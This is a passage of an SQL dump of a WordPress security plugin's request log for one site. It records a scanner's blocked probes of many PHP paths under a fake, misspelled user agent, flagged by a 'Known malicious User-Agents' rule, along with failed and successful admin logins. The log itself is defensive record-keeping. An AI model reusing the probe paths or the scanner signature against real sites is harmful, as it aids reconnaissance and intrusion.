(KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLW1lZGlhLWxpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133375,1699888627.475711,1699888627.466700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-list-table.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-list-table.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLWxpc3QtdGFibGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133544,1699888561.222910,1699888561.214100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.audio-video.matroska.php','http://eckankar-colorado.org/wp-includes/ID3module.audio-video.matroska.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS5hdWRpby12aWRlby5tYXRyb3NrYS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133545,1699888560.867401,1699888560.855700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.audio-video.flv.php','http://eckankar-colorado.org/wp-includes/ID3module.audio-video.flv.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS5hdWRpby12aWRlby5mbHYucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133546,1699888560.512244,1699888560.503400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.audio-video.asf.php','http://eckankar-colorado.org/wp-includes/ID3module.audio-video.asf.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS5hdWRpby12aWRlby5hc2YucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133547,1699888560.170596,1699888560.156100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3getid3.php','http://eckankar-colorado.org/wp-includes/ID3getid3.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM2dldGlkMy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133548,1699888559.834243,1699888559.825400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3getid3.lib.php','http://eckankar-colorado.org/wp-includes/ID3getid3.lib.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM2dldGlkMy5saWIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133540,1699888562.560061,1699888562.551400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ID3module.audio.dts.php','http://eckankar-colorado.org/wp-includes/ID3module.audio.dts.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lEM21vZHVsZS5hdWRpby5kdHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133554,1699888556.884348,1699888556.875800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/user.php','http://eckankar-colorado.org/wp-includes/user.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3VzZXIucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(134337,0.000000,1700065159.033553,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','loginOK',NULL,NULL),(134338,0.000000,1700066153.363726,0x00000000000000000000FFFF4C8278C6,0,200,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?interim-login=1&wp_lang=en_US','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','loginOK',NULL,NULL),(134339,0.000000,1700069800.574595,0x00000000000000000000FFFF4C8278C6,1,200,0,2,0,'https://eckankar-colorado.org/wp-login.php?action=logout&_wpnonce=40fb52bcad','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36','logout',NULL,NULL),(134340,0.000000,1700070268.281674,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','loginOK',NULL,NULL),(134341,0.000000,1700071019.886278,0x00000000000000000000FFFF4C8278C6,0,302,0,2,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2Fplugins.php&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0','loginOK',NULL,NULL),(133524,1699888568.376621,1699888568.363900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-server.php','http://eckankar-colorado.org/wp-includes/IXR/class-IXR-server.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItc2VydmVyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133525,1699888568.040850,1699888568.024900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/IXR/class-IXR-request.php','http://eckankar-colorado.org/wp-includes/IXR/class-IXR-request.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL0lYUi9jbGFzcy1JWFItcmVxdWVzdC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133359,1699888633.173900,1699888633.165000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/includes/class-wp-site-icon.php','http://eckankar-colorado.org/wp-admin/includes/class-wp-site-icon.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL2luY2x1ZGVzL2NsYXNzLXdwLXNpdGUtaWNvbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133093,0.000000,1699803073.667218,0x00000000000000000000FFFF14C1E801,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(133094,0.000000,1699807029.677453,0x00000000000000000000FFFF14C1E801,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(133095,0.000000,1699810990.972752,0x00000000000000000000FFFF14C1E801,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(133096,0.000000,1699811919.920308,0x00000000000000000000FFFFC11D6BFA,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','https://eckankar-colorado.org/wp-login.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','loginFailInvalidUsername',NULL,NULL),(133616,1699888533.628382,1699888533.612800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/feed.php','http://eckankar-colorado.org/wp-includes/feed.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZlZWQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133220,1699888688.188652,1699888688.179900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/rishi/','http://eckankar-colorado.org/wp-content/themes/rishi/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL3Jpc2hpLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133221,1699888687.819344,1699888687.806700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/alera/','http://eckankar-colorado.org/wp-content/themes/alera/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2FsZXJhLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133222,1699888687.487169,1699888687.475200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/core-stab/','http://eckankar-colorado.org/wp-content/plugins/core-stab/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jb3JlLXN0YWIv\",\"category\":\"brute-force\",\"ssl\":1}'),(133179,1699888483.708031,1699888483.699400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-pop3.php','http://eckankar-colorado.org/wp-includes/class-pop3.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXBvcDMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133180,1699888483.255761,1699888483.247000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-phpmailer.php','http://eckankar-colorado.org/wp-includes/class-phpmailer.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXBocG1haWxlci5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133281,1699888660.425303,1699888660.416100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wordpress/wp-admin/includes/wp-admin/js/','http://eckankar-colorado.org/wordpress/wp-admin/includes/wp-admin/js/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1hZG1pbi9pbmNsdWRlcy93cC1hZG1pbi9qcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133563,1699888553.457192,1699888553.442200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/style-engine.php','http://eckankar-colorado.org/wp-includes/style-engine.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLWVuZ2luZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133562,1699888553.836763,1699888553.827500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/taxonomy.php','http://eckankar-colorado.org/wp-includes/taxonomy.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3RheG9ub215LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133550,1699888558.255525,1699888558.244400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/wp-db.php','http://eckankar-colorado.org/wp-includes/wp-db.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dwLWRiLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133551,1699888557.912186,1699888557.903500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/widgets.php','http://eckankar-colorado.org/wp-includes/widgets.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3dpZGdldHMucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133556,1699888555.893188,1699888555.884500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/theme.php','http://eckankar-colorado.org/wp-includes/theme.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 